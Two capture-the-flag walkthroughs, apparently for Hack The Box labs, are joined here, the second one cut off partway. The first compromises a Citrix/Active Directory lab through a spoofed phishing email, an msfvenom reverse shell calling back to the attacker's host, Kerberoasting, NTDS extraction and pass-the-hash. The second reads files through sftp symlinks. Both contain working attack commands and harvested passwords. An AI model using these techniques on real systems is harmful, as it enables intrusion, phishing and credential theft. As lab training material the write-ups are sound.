closed port Device type: specialized|general purpose|phone Running (JUST GUESSING): Microsoft Windows 7|8|Phone|2008|8.1|Vista (91%) OS CPE: cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1 Aggressive OS guesses: Microsoft Windows Embedded Standard 7 (91%), Microsoft Windows 8.1 Update 1 (91%), Microsoft Windows Phone 7.5 or 8.0 (91%), Microsoft Windows 7 or Windows Server 2008 R2 (90%), Microsoft Windows Server 2008 (90%), Microsoft Windows Server 2008 R2 (90%), Microsoft Windows Server 2008 R2 or Windows 8.1 (90%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (90%), Microsoft Windows 7 (90%), Microsoft Windows 7 Professional or Windows 8 (90%) No exact OS matches for host (test conditions non-ideal). Network Distance: 2 hops Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: mean: 8s, deviation: 0s, median: 8s TRACEROUTE (using port 443/tcp) HOP RTT ADDRESS 1 24.00 ms 10.14.14.1 2 24.00 ms humongousretail.com (10.13.38.12) OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 60.99 seconds E:\PENTEST>
It seems we have HTTP and HTTPS on port 80 and 443, and SMTP on 25.
Overview of Web Services
Let’s take a quick look at the webpages to see what we have. I got the following on port 80, which redirected me to port 443, the certificate for the site provided and a new domain of hunongousretail.com.
I didn’t have much to go on, so I decided to do some directory enumeration.
Directory Enumeration
I used wfuzz in this case because gobuster didn’t come up with anything useful. wfuzz –hc 404 -w raft-small-words.txt http://10.13.38.12/FUZZ
Web Directories
We had several other directories that seemed interesting but the ones I wanted to look at are Remote and Jakarta.
Opening the https://hunongousretail.com/remote, I get the following.
And browsing https://hunongousretail.com/jakarta, I got the following.
I had a look at these for some time to see if I could come up with anything useful, I looked deeper into the directories and for known exploits for the XenAPP application. Knowing this environment is called XEN, I decided to concentrate my efforts on the remote directory, rather than the Jakarta. After spending some more time on this, I decided to investigate the SMTP service. I had done examples in the past where the users were very responsive.
SMTP Enumeration
I had the domain name of the company, therefore I decided to see if I could get any email addresses and see if I could somehow get a response from someone. smtp-user-enum -M RCPT -U ./usernames.txt -D humongousretail.com -t 10.13.38.12
I had found 4 addresses;
- sales@humongousretail.com
- it@humongousretail.com
- marketing@humongousretail.com
- legal@humongousretail.com
Now that I had these 4 addresses, I needed to ensure that I could send mail through. I decided to use an internal address to try and get a response from someone.
User Response
To see if I was getting a response, I had a listener running to capture anything that may come through.
nc -nlvp 80
I then attempted a lot of different emails and a lot of different subjects. I eventually got a hit with the subject of Remote. My thoughts on this was to try and get the users to click on my link. My thoughts were as follows;
telnet 10.13.38.12 25 helo humongousretail.com
MAIL FROM: it@hunongousretail.com
RCPT TO: sales@humongousretail.com
DATA Subject: Remote Portal Hi, The URL for the remote portal has now been changed to http://10.14.15.106 Regards
IT QUIT
I chose to do this because a mail from the IT department sent out to a group of people would hopefully get me something. The users should trust an email coming in from IT, or so you would think.
Once the email had been sent, I didn’t get a response, but 30 seconds later, I had some data returned. It was the user clicking on the link to the new portal and providing their credentials.
I had a username of pmorgan and a password of Summer1Summer!. Although I knew that had worked, I tried again to ensure I had it correctly, and had a different user response.
I now had another user. This one being jmendes and password VivaBARC3L0N@!!!.
I kept this up to see if I could get any more responses and I had one more.
The last response I had gave me the user awardel and password @M3m3ntoM0ri@. I had 3 users
pmorgan:Summer1Summer! jmendes: VivaBARC3L0N@!!! awardel:@M3m3ntoM0ri@
Citrix XenAPP
I had the 3 users and knew that they must work somewhere. I browsed to the remote site and entered the credentials of pmorgan
And I now had access to a desktop.
I tried this for each user that I had and each of the worked and successfully logged in.
I clicked on the Desktop to access and and was asked to open the launch.ica file which was defaulted to open with the Citrix Receiver Engine. after i installed icaclientWeb_19.12.0.19_amd64.deb on kali
Once I had click ok, I was presented with a Desktop. I browsed to the Desktop of the user and I was presented with the 1st flag.
1 – XEN{wh0_n33d5_2f@?} Breach
Gaining a shell
Now that I had access to the desktops, I wanted to get a shell to see if I could elevate my privileges them. I first made a note off all the users and desktops they were assigned to
I created the reverse shell that I wanted so that I could get a meterpreter session.
msfvenom –platform windows -p windows/meterpreter/reverse_tcp LHOST=10.14.15.106 LPORT=10086 -f exe x86exploit.exe
I then proceeded to setup m msfconsole as follows.
Now that I had everything setup, I started the SimpleHTTPServer so that I could download the file necessary to exploit the system.
python -m SimpleHTTPServer 80
I then browsed to my machine on the vdesktop and downloaded the file.
I now started the exploit and got a meterpreter shell.
Privilege Escalation on Desktop
Now that I had a meterpreter shell, I wanted to see if I could elevate my privileges. I decided to use the local exploit suggester.
I first put my session to the background and started the suggester. use post/multi/recon/local_exploit_suggester
Seeing the results from the suggester, I decided on using the always install elevated exploit. use exploit/windows/local/always_install_elevated
I had successfully raised my privileges. I looked to see what was on the Administrator Desktop, and I had found the second flag.
2 – XEN{7ru573d_1n574ll3r5} Deploy
Further Enumeration
Now that I had a way into the inside of the network, I saw the internal network as 172.16.249.0/24, I wanted to perform a quick scan of the network to identify hosts. To pivot within the internal network, I used a socks proxy within msf. use auxiliary/server/socks4a
Now that I had done this, I wanted to see what hosts were live on the internal network. Knowing the IP’s of the desktops, I chose to only scan a small range. I wanted to scan between 199 and 210.
I managed to get an additional 3 IP’s.
- 172.16.249.200 (DC)
- 172.16.249.201 (Citrix)
- 172.16.249.202 (NetScaler)
Because of this, I decided to use a technique I had used in a previous engagement called Kerberoasting.
With the system shell that I had earlier, I decided to upload the Kerberoasting module.
Further credentials
I now wanted to see if there were any further credentials that I could find
PS C:\Users\pmorgan\Desktop> .\Rubeus.exe kerberoast /outfile:service_ticket.txt ______ _ (_____ \ | | _____) )_ _| |__ _____ _ _ ___ | __ /| | | | _ \| ___ | | | |/___) | | \ \| |_| | |_) ) ____| |_| |___ | |_| |_|____/|____/|_____)____/(___/ v1.4.2 [*] Action: Kerberoasting [*] NOTICE: AES hashes will be returned for AES-enabled accounts. [*] Use /ticket:X or /tgtdeleg to force RC4_HMAC for these accounts. [*] Searching the current domain for Kerberoastable users [*] Found 1 user(s) to Kerberoast! [*] SamAccountName : mturner [*] DistinguishedName : CN=Mark Turner,OU=Contractors,DC=htb,DC=local [*] ServicePrincipalName : MSSQLSvc/CITRIXTEST.HTB.LOCAL:1433 [*] Supported ETypes : RC4_HMAC_DEFAULT [*] Hash written to C:\Users\pmorgan\Desktop\service_ticket.txt [*] Roasted hashes written to : C:\Users\pmorgan\Desktop\service_ticket.txt PS C:\Users\pmorgan\Desktop> dir Directory: C:\Users\pmorgan\Desktop Mode LastWriteTime Length Name ---- ------------- ------ ---- -a--- 4/4/2020 11:13 AM 7 cmd.bat -ar-- 4/6/2019 11:11 PM 19 flag.txt -a--- 2/20/2020 6:53 PM 41534 Invoke-Portscan.ps1 -a--- 3/26/2020 10:56 AM 16128568 netscan64.exe -a--- 4/6/2020 8:57 PM 295 netscan64.lic -a--- 4/6/2020 8:57 PM 39301 netscan64.xml -a--- 2/20/2020 6:30 PM 770279 powerview-dev.ps1 -a--- 9/22/2019 10:20 AM 883600 putty.exe -a--- 11/27/2019 2:17 PM 198144 Rubeus.exe -a--- 4/6/2020 9:12 PM 2172 service_ticket.txt -a--- 3/28/2020 11:17 AM 832512 SharpHound.exe -a--- 3/28/2020 11:17 AM 973323 SharpHound.ps1 -a--- 4/6/2020 8:59 PM 32665 winPEAS.bat -a--- 4/6/2020 8:59 PM 241152 winPEAS.exe [to get a proper command prompt we us] PS C:\Users\pmorgan\Desktop> type cmd.cmd cmd.exe PS C:\Users\pmorgan\Desktop> type service_ticket.txt $krb5tgs$23$*mturner$htb.local$MSSQLSvc/CITRIXTEST.HTB.LOCAL:1433*$107F90C880956CA6ABBBAB4F9C2FB71B$15B748ACB9F233974753E8F01B946449197403730D59DB4B2D72E600B8C7AC5D3178F52A1C5562A1146824D2F33756CBF95D70EAC796B6F1D006FF6CF3DC1D1EA05B6E9839D67AA634F7B0FD24C1CE69F7CE49B5314CCFA49D074BEA3A457E5EEA9F91822E7F1676439ED137A54E5ADF1546A6AB5CA3B808EECC77A5F2E94880B39457CD714425340EA8DFE186B9A90BE5C541D990C6C7E0C82F95043A81DC85DF709CF7E45151B022EA8275C4ED2F0578F9462847F9E1CF21BEFBA5FB187A810DFAD7D2D62C04785842CBD44BB1B8AA94E9D9EFA691A8FF54392210C635E8B004C42E4F71EFF3EC30599A33F1F434A1705FF4378E553071A6A974FB58569CCFDE795E39492AD893BDBF55916EA6763D63C1CF476ABA8FC24790F8954C80B5503147681BDA02EB8A9DDE56DE33A266851AFC99E72A6E08C5CA6BD127EC9AAA3BD3AE026E94BD481FF3583A28C9A3CF408110C4FF8551A27E615A15F0125AAB8761E8D5B1DA35858BE845D031F253E46EBE6987A94D1A8848820511226F95C4F0E27798E575F179C06EBB12C76EEAFD4CA977E085A392B06EB805033A229C26504AA8EB871041346DAB4B92D5400B030C6CFA0EE853656F4AAAF857F04B30D0BF7376B37634CE0DD3D82B78A3005E5C3E174915960674AE255995A3B37AFC82944D87920BE43302DFF9EAC0D559298D943FAFFBA118DA31688858C415342B729949B6366B07F3A8AD9B3B310A73EB689C38A087C4E05D9917DC46E01B25C808B7A3F93449E1E5CD7CA02018EA77DD3E339BDDF6ACF4CCC991BDAFB45E9809F9C12CF9358C5D07ABFA105E90206EE59B7ED6D5161BA186AF275AEC9B046B0E600585750BC259FA108CD62A0CFF191F4A30EFEE4BAFECCE07F3BAC3A22055672F4E761D220D5F8E1CB4BD51FA5BDCC8CDA524A709A389A31E913174455592CE322BFD32E572A7DF97C599E05CC3771A4FA952B9C34B273AD284DF237187EDCEAF2922AFBE3C4927E67B2B5FEA3F9AB57AD47436031EDB5A8D4C5D31FACF307E8CAAD66D61D6760CA3B9A4EDF10B0F6315B9D3FA7F7118EC6AA446F4642883D7DAF016CB4F7F8F3DB305AD0F6CB087FA149B4C439EE164B6B809EFD1A2FABDD115D77B1371B06968C8E6479BFB94C51763EE71A064D445D28FE30EF81EE3FDDF437C495305913C30F4B99E749187F1C09DD3DC10DD39B23AD5A84BE8CA906D3C01770CD71291FBC43D3D2A61E0DBD651106BFE97B6F2DFFF1A70F0BC825BD68D3B791CD67211162BA7C021D606FA0AD46175FF04E785607F186885802F0305F04876A5657CE9DB0BAECEBA1F2593DC7C8B70B295DE3D0F47201CD149232DCBB303853A4042677C96F9E286A06A8AB54F3FAAE0B3DCF2D92D76F511FB11492364C8AF22AC6F0462E039D66F74025BB76BC870B94388D69FD1295DF592C6205B8871BD55FCC5429EDCB690719836 PS C:\Users\pmorgan\Desktop> copy "\\Client\D$\SharpHound.ps1" . PS C:\Users\pmorgan\Desktop> Set-ExecutionPolicy -Scope CurrentUser PS C:\Users\pmorgan\Desktop> Bypass PS C:\Users\pmorgan\Desktop> .\Sharphound PS C:\Users\pmorgan\Desktop> Import-Module .\SharpHound.ps1 PS C:\Users\pmorgan\Desktop> get-help Invoke-BloodHound PS C:\Users\pmorgan\Desktop> Invoke-BloodHound -CollectionMethod All PS C:\Users\pmorgan\Desktop> copy .\service_ticket.txt \\Client\D$\ PS C:\Users\pmorgan\Desktop> copy "\\Client\D$\netscan64.exe" . PS C:\Users\pmorgan\Desktop> PS C:\Users\pmorgan\Desktop> Import-Module .\powerview-dev.ps1 PS C:\Users\pmorgan\Desktop> Get-NetUser PS C:\Users\pmorgan\Desktop> Get-NetUser | Ft samAccountName
I copied the contents of this token to a file named mturner so that I could now run this through hashcat.
I exhausted all password lists that I had with this and decided to look up some hashcat rules online to see what I could come up with. I eventually came up with a ruleset that had potential which was found at https://github.com/NSAKEY/nsa–rules.git.
hashcat -m 13100 ./mturner rockyou.txt rules/_NSAKEY.v2.dive.rule –debug-mode=1 –debugfile=matched.rule –force -0
After several hours, I eventually got a hit on the password.
We now know that the password for mturner is 4install!
SMB Access
Now that I had the new credentials I looked about a little more to see what else I could find. I eventually found SMB on 172.16.249.201 and decided to use the credentials found to see if I could see anything. proxychains smbmap -u mturner -p ‘4install!’ -d htb.local -H 172.16.249.201
This showed that we had access to read the files locate in the Citrix$ folder. I connected to this to see what was inside the folder with smbclient tools.
proxychains smbclient \\\\172.16.249.201\\Citrix$ -U htb.local
I was provided with some interesting files. The 2 of interest at this point are flag.txt and private.ppk.
I downloaded these file and was able to read the next flag.
3 – XEN{l364cy_5pn5_ftw} Ghost
Putty file Conversion
Now that I had a putty private key file, I had a look at its contents to see if I could get a hint at anything.
It seems this could be used in putty but has a password on it too. I needed to try and crack the password on this before I could proceed. I decided to convert this with putty2john. putty2john private.ppk > private.hash
Now that I had this file in a readable format for john, I tried to crack the password.
After several hours, all my password lists came up empty. I was unable to crack the password with what I had. I decided to look elsewhere to see what I could potentially use as a password list generator. I found a password generator that seemed interesting and decided to run with it. I found this at https://github.com/hashcat/kwprocessor
./kwp -o passes basechars/tiny.base keymaps/en-gb.keymap routes/2-to-32-max-5-directionchanges.route
Once I had the password list generated, I then had to put it through john to try and crack it again. john -w=./passes private.hash
Now that I knew the password for the file, I could now convert the file for use with my system. To do this, I used puttygen. puttygen private.ppk -O private-openssh -o id_rsa
I now had a key file that I could use.
Access to NetScaler
During the time gathering information, I had accumulated many user id’s and I tried all of them with the private key to get onto the SSH of the NetScaler. I then quickly found the default username of the devices is nsroot. I then attempted to login with this user id. proxychains ssh -i id_rsa nsroot@172.16.249.202
Now that I had access to the NetScaler as root of the device, I hunted around to see if I could find anything. After a while of searching, I did not come up with anything useful. Remembering that the device is essentially a firewall and router, I decided to listen to the traffic passing through the device and remembered a specific article at https://hackertarget.com/tcpdump–examples/.
I attempted this to see if I would get any results. tcpdump -s 0 -A -n -l | egrep -I “POST /|pwd=|passwd=|password=|Host:”
4 – XEN{bu7_ld4p5_15_4_h455l3} Camouflage
LDAP
Knowing that I had access to this box as root, I wanted to perform some additional test to see what other potential traffic was being passed through it. The previous flag seemed to suggest ldap could be being used. I set up a tcpdump to capture this for me. tcpdump -w capture.pcap
I now had to transfer the file back to my machine for investigation. I used scp for this.
proxychains scp -i id_rsa nsroot@172.16.249.202:/root/capture.pcap .
I then opened this file within Wireshark to see what I could find.
Now going from the previous hint, I searched for the LDAP traffic and found a password.
The password that I had found was #S3rvice#@cc which was for the netscaler-svc account.
msf > use auxiliary/server/socks4a msf > set srvport 8888 msf > route add 172.16.249.0 255.255.255.0 1 msf exploit
root@kali:~/htb/xen# proxychains GetUserSPNs.py -request -dc-ip 172.16.249.200 HTB.LOCAL/netscaler-svc:#S3rvice#@cc ProxyChains-3.1 (http://proxychains.sf.net) Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation |S-chain|-<>-127.0.0.1:8888-<><>-172.16.249.200:389-<><>-OK ServicePrincipalName Name MemberOf PasswordLastSet LastLogon ---------------------------------- ------- --------------------------------------- -------------------------- -------------------------- MSSQLSvc/CITRIXTEST.HTB.LOCAL:1433 mturner CN=Deployment,OU=Groups,DC=htb,DC=local 2019-02-13 23:23:48.796612 2019-04-10 22:14:57.105936 |S-chain|-<>-127.0.0.1:8888-<><>-172.16.249.200:88-<><>-OK |S-chain|-<>-127.0.0.1:8888-<><>-172.16.249.200:88-<><>-OK |S-chain|-<>-127.0.0.1:8888-<><>-172.16.249.200:88-<><>-OK $krb5tgs$23$*mturner$HTB.LOCAL$MSSQLSvc/CITRIXTEST.HTB.LOCAL~1433*$30e2233e1b0123f3c7579d9f7a2384fb$08230b2c73edf5bc2afe0b13d494c385d67db84bc38ac830497f2e8eb1f2c148094dcd6f1cad0d26a896291119eb2a8cb196d388c568ce2348d4e69f16da74245af5298d42cf19c7958359f901d4a0f32ffb708e4ac037dd49411fce5e59ff58d6f3e184dcb7064b86c134bed4a6bf74af15875edd0800b464d3146559b62cadccd399484b4317f63aab2a9fe85ae08bfe4dece4ff25f040fa9de0c61f290670df1dd5b368a0c5b8c6e546bf547c6fbb63cb1bdf179d0eedb0ee37647a6a8e63d4a76b0e5d9f511e751cf8b4acfa4702aac9050a6e01496e4a4d26762805d950b27723d7e2a9831de5a8fdd78b8e480b16974ff4865114d74c1eee1715d5cd862afcff076f448c370c1b2ae0666770c00391c65384f525ff6f33210077e2b73cf0ae892352b3163fd0fde062e037adafbec57c705535d751efd0ecc31356cd8d933c29635107aa5add7043df5a20710a056869b872cb60203e7d7934574579837e01df2e57c580f4c6e19483c821bd5f533b378d43df50ad8fc6665bab80be7478462ccecca5208710a6b85b001ca602c2ab1920f6134ed5a59a27cd622ec2ffa6828ac4e65cb10b9d3dc5f61a50a7002ea737b41d9ffc603c0b54fe70764773468eced0d158a67ba15fe7c62083a01b447f5be2218a3ab6500378f69bacb34e6fcc1050320d9c965e75b188bf2d64ca89815b77220aa1300787e43fe9b0123447247b9ac82774c27425668d03930c48bde5cbb71d29b49d18c0473efb6a5707ca8498577b81f9a371b5fba0020699df3e0ad90566a9b366f731c98c2c1b1a454b0081aaf9d9074e69d3d0b47fcbf235b45d483bc37a0bb82f68623d6d2fd3d6bd43c2927bc713247fbcd5d492101b2b4f9b122b070897bae58d85730e5f718ad293401ea8fa9a9d691cf5e13c5187d91ed09ab4a2f5b57803e655e97145a7c0a9b371430d1f5e97e9f023f3a07ec587269758a6f2f2c2a58a2d8e61694c1950123edac23cbd9d007723d94b8542eef551a0459a50bed98f8a3d870bb8b55c2db8f12ed382fe9a4c5ed754eea8e14aa2c1b1cd15d3f2bed369071e2474eb93a0e9f9a2dfb986b25ed3459f5a956578d309fa74b6855beccdf7ba5e6facc63ebd1f6f251656b7756683582fe20e3b6cf669116df64ba68bd6beb3c09076a343f3f2b665b70d13ec65e18ddcea07bcae355517e1bdfb3bc2fc35542f08e9d29e5d1d047ecc04e4eed26bfbc8e397549820605811c7c154cfdd2650ee928d93fb770f55a84ce5ff864fbcb9e6a458f3b04c82d6d890315b0ae78227bea7ab43939d22466c27a8d8501eee6c7218dcdf772bde661302151ea644cfcc2576e8e462
root@kali:~/xen# proxychains smbmap -u mturner -p '4install!' -d htb.local -H 172.16.249.201 ProxyChains-3.1 (http://proxychains.sf.net) [+] Finding open SMB ports.... |S-chain|-<>-127.0.0.1:1080-<><>-172.16.249.201:445-<><>-OK |S-chain|-<>-127.0.0.1:1080-<><>-172.16.249.201:445-<><>-OK |S-chain|-<>-127.0.0.1:1080-<><>-172.16.249.201:445-<><>-OK [+] User SMB session establishd on 172.16.249.201... [+] IP: 172.16.249.201:445 Name: 172.16.249.201 Disk Permissions ---- ----------- ADMIN$ NO ACCESS C$ NO ACCESS Citrix$ READ ONLY IPC$ NO ACCESS ISOs NO ACCESS ISOs-TEST NO ACCESS root@kali:~/xen#
root@kali:~/xen# proxychains smbclient \\\\172.16.249.201\\Citrix$ -U htb.local\\mturner ProxyChains-3.1 (http://proxychains.sf.net) WARNING: The "syslog" option is deprecated |S-chain|-<>-127.0.0.1:1080-<><>-172.16.249.201:445-<><>-OK Enter HTB.LOCAL\mturner's password: 4install! Try "help" to get a list of possible commands. smb: \> ls . D 0 Wed May 8 18:12:51 2019 .. D 0 Wed May 8 18:12:51 2019 Deploying-XenServer-5.6.pdf A 997001 Tue Feb 12 18:21:10 2019 flag.txt AR 20 Sun Mar 31 11:25:10 2019 private.ppk A 1486 Wed May 8 18:21:51 2019 XenServer-5-6-SHG.pdf A 1747587 Tue Feb 12 18:21:32 2019 10485247 blocks of size 4096. 6344443 blocks available
Doppelganger
The term doppelganger is a non-biologically related look-alike (Wikipedia). This provided me with the hint of looking back at the other accounts that were active on the domain. I immediately got access to a shell again on the desktop and looked up domain details.
I was looking for what was hopefully an account that may seem to be like the found netscaler-svc account.
After all, I had tried this account in so many different places to access different resources and none were successful.
net user /domain
After a few attempts at usernames, I discovered that the backup-svc had the same password as the NetScaler password. These essentially shared the same password. This was out doppelganger. I then tried to login to the Domain controller using winrm and proxychains to see if I could get a successful access because I knew it was a member of the Backup Operators group which generally has access. proxychains ruby winrm_shell_with_upload.rb
root@kali:~/xen# proxychains ruby winrmshell2withupload.rb
ProxyChains-3.1 (http://proxychains.sf.net)
|S-chain|-<>-127.0.0.1:1080-<><>-172.16.249.200:5985-<><>-OK
PS htb\backup-svc@DC Documents>
PS htb\backup-svc@DC Desktop> type flag.txt
XEN{y_5h4r3d_p@55w0Rd5?}
PS htb\backup-svc@DC Desktop>
I looked on the Desktop of backup-svc and found the next flag.
5 – XEN{y_5h4r3d_p@55w0Rd5?} Doppelganger
Privileges
Now that I was on the box, I wanted to see what privileges I had to understand what else could be achieved with simply logging in through WinRM. whoami /priv
This was sure interesting. It seems I had a few privileges including the Backup and Restore. This seemed obvious though with the account being named backup-svc.
I first tried to access the Administrator Desktop and was denied access.
From this I knew something had to be done with backup privileges. I had recently done an exercise in the office that I work in on retrieving the Active Directory Database to extract the hashes. This is something that I do on a regular basis and therefore knew I would have to create a shadow copy of the drive to even attempt to gain access to the NTDS.
I looked at all the usual methods of creating a shadow copy including vssadmin and wbadmin. However, I then found an article which covered doing this with diskshadow. This was highlighted in the following document. https://github.com/decoder–it/whoami–priv–
Hackinparis2019/blob/master/whoamiprivParis_Split.pdf. I wanted to try and get RDP access to the machine and therefore setup a portfwd to give me access.
portfwd add -l 3389 -r 172.16.249.200 -p 3389
I then tried to open an RDP session to the machine using remmina.
I decided to utilise this to give myself hopefully a little more access proxychains xfreerdp ipv remmina
Install freerdp-x11
sudo apt-get install freerdp-x11
root@kali:~# proxychains xfreerdp /v:172.16.249.200 /u:backup-svc ProxyChains-3.1 (http://proxychains.sf.net) [03:37:43:732] [6460:6461] [INFO][com.freerdp.client.common.cmdline] - loading channelEx cliprdr |S-chain|-<>-127.0.0.1:1080-<><>-172.16.249.200:3389-<><>-OK Password: #S3rvice#@cc [03:37:58:008] [6460:6461] [INFO][com.freerdp.gdi] - Local framebuffer format PIXEL_FORMAT_BGRX32 [03:37:58:008] [6460:6461] [INFO][com.freerdp.gdi] - Remote framebuffer format PIXEL_FORMAT_RGB16 [03:37:58:120] [6460:6461] [INFO][com.winpr.clipboard] - initialized POSIX local file subsystem
And I was given the RDP access I was looking for.
I now decided to run through diskshadow to see if I could create a shadow of the drive.
Shadow Copies
Diskshadow set context persistent nowriters add volume c: alias dmwong create expose %dmwong% z:
Once I had created the backup, I restore this by importing the modules found at
https://github.com/giuliano108/SeBackupPrivilege/tree/master/SeBackupPrivilegeCmdLets/bin/Deb ug.
I opened PowerShell and imported the 2 modules.
Copy-FileSebackupPrivilege z:\Windows\NTDS\ntds.dit c:\temp\ndts.dit reg save hklm\system c:\temp\system.bak
Now that I had access to these files, I continued to download them onto my system for offline cracking.
Domain Admin
Now that I had these files offline I needed to extract the hashes. python /opt/impacket/examples/secretdump.py -ntds ndts.dit -system system.bak LOCAL
This provided me with all the hashes from the Active Directory Database. Now that I had all of these hashes, I decided to use the ‘Pass the Hash’ method to try and gain access to the Domain controller as Administrator.
proxychains python /opt/impacket/examples/wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:822601ccd7155f47cd955b94af1558be Administrator@172.16.249.200
6 – XEN{d3r1v471v3_d0m41n_4dm1n} Owned
Author – Puckiestyle
htb-onetwoseven-nl
This is the write-up of the OneTwoSeven machine from HackTheBox.
Target: 10.10.10.133 [OneTwoSeven]
System: Linux
Difficulty: [6/10]
Part I – User
nmap -sV -v 10.10.10.133
Starting Nmap 7.70 ( https://nmap.org ) at 2019-06-09 01:08 +03
NSE: Loaded 43 scripts for scanning.
Initiating Ping Scan at 01:08
Scanning 10.10.10.133 [2 ports]
Completed Ping Scan at 01:08, 0.06s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 01:08
Completed Parallel DNS resolution of 1 host. at 01:08, 0.09s elapsed
Initiating Connect Scan at 01:08
Scanning 10.10.10.133 [1000 ports]
Discovered open port 22/tcp on 10.10.10.133
Discovered open port 80/tcp on 10.10.10.133
Increasing send delay for 10.10.10.133 from 0 to 5 due to 48 out of 159 dropped probes since last increase.
Completed Connect Scan at 01:08, 7.84s elapsed (1000 total ports)
Initiating Service scan at 01:08
Scanning 2 services on 10.10.10.133
Completed Service scan at 01:08, 6.14s elapsed (2 services on 1 host)
NSE: Script scanning 10.10.10.133.
Initiating NSE at 01:08
Completed NSE at 01:08, 0.34s elapsed
Initiating NSE at 01:08
Completed NSE at 01:08, 0.00s elapsed
Nmap scan report for 10.10.10.133
Host is up (0.061s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
80/tcp open http Apache httpd 2.4.25 ((Debian))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux\_kernel
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.11 seconds
Cool. After double checking it with full port scan, we know that there is a web application on the machine.
It’s time to understand what does this app do. Well, browsing through IP adress will help us.
Someone had made beautiful web application for us. Great job. After visiting some pages on website, I understood that this one is web service for generating personal websites for clients. Just look at that image. You will see there are some buttons on header. Three buttons… First one is for redirecting to home page. Second one is showing statistics about how many user are registered, open web sockets, etc.
Third button is Admin button and it is currently disabled. We don’t know why it is disabled at the moment. Also, there is another button on main page.
It says: Sign up today! And it is redirecting to signup.php with clicking to it.
We are moving through…
Okay, we have some credentials right now. Also, it gives some information about these credentials. These credentials are usable with sftp service. There is another navigation link in this page. When we click to here link, it redirects to onetwoseven.htb/~ots-wOWM5YWM. If we click that link, page will raise “Unknown Host” error.
So, what we have from this page:
URL: http://onetwoseven.htb/~ots-wOWM5YWM
username: ots-wOWM5YWM
password: eb09c9ac
We can’t connect to that URL. Because, our machine does not recognize that host. We should edit /etc/hosts file and we should append 10.10.10.133 onetwoseven.htb to bottom of this file.
127.0.0.1 localhost
10.10.10.133 onetwoseven.htb
Then, we visit http://onetwoseven.htb/~ots-wOWM5YWM again. There is a blank page with a background image. So, let’s think about what does that app do. It creates personal web pages and serving them. We can probably upload our personal files with sftp access with given credentials. Time to connect that app via sftp:
sftp ots-wOWM5YWM@10.10.10.133
password: eb09c9ac
Connected to ots-wOWM5YWM@10.10.10.133.
The directory structure is shown below:
ls -la
drwxr-xr-x 3 0 0 4096 Jun 8 22:09 .
drwxr-xr-x 3 0 0 4096 Jun 8 22:09 ..
drwxr-xr-x 2 1003 1003 4096 Feb 15 21:03 public_html
sftp> cd public_html/
sftp> ls -la
drwxr-xr-x 2 1003 1003 4096 Feb 15 21:03 .
drwxr-xr-x 3 0 0 4096 Jun 8 22:09 ..
-rw-r--r-- 1 1003 1003 349 Feb 15 21:03 index.html
If we upload .php here, maybe we can execute command on it. Let’s try it out.
cd public_html
put test.php
Navigating to test.php page through browser gives Forbidden response code. So, we can’t upload .php file. Probably, .htaccess folder blocks it.
I tried to upload .htaccess folder too, but got the same response. We have to try to something different.
Let’s check which commands are executable on sftp service.
sftp> help
Available commands:
bye Quit sftp
cd path Change remote directory to 'path'
chgrp [-h] grp path Change group of file 'path' to 'grp'
chmod [-h] mode path Change permissions of file 'path' to 'mode'
chown [-h] own path Change owner of file 'path' to 'own'
df [-hi] [path] Display statistics for current directory or
filesystem containing 'path'
exit Quit sftp
get [-afPpRr] remote [local] Download file
reget [-fPpRr] remote [local] Resume download file
reput [-fPpRr] [local] remote Resume upload file
help Display this help text
lcd path Change local directory to 'path'
lls [ls-options [path]] Display local directory listing
lmkdir path Create local directory
ln [-s] oldpath newpath Link remote file (-s for symlink)
lpwd Print local working directory
ls [-1afhlnrSt] [path] Display remote directory listing
lumask umask Set local umask to 'umask'
mkdir path Create remote directory
progress Toggle display of progress meter
put [-afPpRr] local [remote] Upload file
pwd Display remote working directory
quit Quit sftp
rename oldpath newpath Rename remote file
rm path Delete remote file
rmdir path Remove remote directory
symlink oldpath newpath Symlink remote file
version Show SFTP version
!command Execute 'command' in local shell
! Escape to local shell
? Synonym for help
symlink command looks suspicious. If there are lack of security in chroot configurations, possibly we can symlink to other files with sftp. We should quickly test which files are accessible.
symlink / public_html/root
symlink /etc/passwd passwd
This command executed correctly. But there is no way of reading it with sftp service. But there is something else. Files are serving on http://onetwoseven.htb/~ots-wOWM5YWM/.
Okay, good. We can read that passwd file from http://onetwoseven.htb/~ots-wOWM5YWM/passwd
Reading that file is pretty cool for user enumeration.
Interesting… There are 3 more different users. They have their own home directories. It’s okay. The first one is interesting, right? It uses 127.0.0.1 as connection address. So, that user is machine itself. Maybe, we should find a way to escalate that user. Before that, creating a symbolic link to that user’s directory could be provided some information for that process.
symlink /home/web/ots-yODc2NGQ ots-yODc2NGQ
This code executed without giving any errors.
Let’s navigate that directory.
Woah! User flag is there. Is it that easy?
http://onetwoseven.htb/~ots-wOWM5YWM/ots-yODc2NGQ/user.txt
Nah! Not that easy. Boo for you.
So, we should enumerate more to achieve that user.
At that point, I enumerated some directories. But it didn’t help until I found two different juicy directories.
The first one is /var/www/html/. It redirects to home page of http://10.10.10.133. If we create symbolic links more specific, we can read what are these .php files does on home page.
The second one is /var/www/html-admin.
I found these two directories with generating a symbolic link for /var/www.
Let’s start with the second one, it looks more interesting. When we browse into that file, we can see that there is a .php.swp file lying there. Probably, someone was editing the login.php file. Then, some unexpected situation happened and login.php file has saved as login.php.swp file.
After downloading it, all we have to do is run necessary command for checking what is that file keeping.
vim -r login.php.swp
Inspectation of this file is gives us two different information for us.
First one:
Possibly, there is an application running at port 60080 on local.
Second one:
If there is an application running at port 60080, it has a login page and authentication creds are hard coded.
At this point, hashkiller will help.
Great! We got necessary credentials for authenticate into that application.
username: ots-admin
password: Homesweethome1
